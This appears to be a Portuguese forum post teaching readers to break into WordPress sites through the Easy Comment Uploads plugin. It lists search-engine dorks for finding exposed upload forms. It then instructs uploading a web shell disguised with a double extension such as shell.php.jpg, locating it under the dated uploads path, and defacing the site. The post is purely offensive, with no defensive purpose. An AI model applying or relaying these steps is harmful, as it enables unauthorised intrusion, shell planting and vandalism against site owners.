Tweet
Boa tarde Galerinha hoje venho ensinando como invadir sites em Wordpress
uma falha antiga mas pouco conheçida a Wordpress Exploit
Dorks
Código PHP:
inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
allinurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
exemplo:
target.com/wp-content/plugins/easy-comment-uploads/upload-form.php
com este link o site irá abrir uma pagina de Upload, que esse é o nosso objetivo introduzir a Shell no servidor e depois fazer o deface
eu recomendo que upe uma shell com extensão de imagem
exemplo: shell.php.jpg
ou voce pode tentar pelo php mesmo mas alguns sites não lhe tem permissão para extensão .php
PROCURANDO A SHELL
SITE QUE VOCÊ escolheu/wp-content/uploads/[anos]/[mes]/seu arquivo.php ou .jpg
Veja como vai ficar
SITE QUE VOCÊ escolheu/wp-content/uploads/2013/11/seu arquivo.php ou .jpg
Obs: Lembrando que você precisa saber o /[anos]/[mês]/ para poder procurar a shell por que se você não sabe "word press é em estilo para blogs"
Enjoy
Creditos: Google
Comment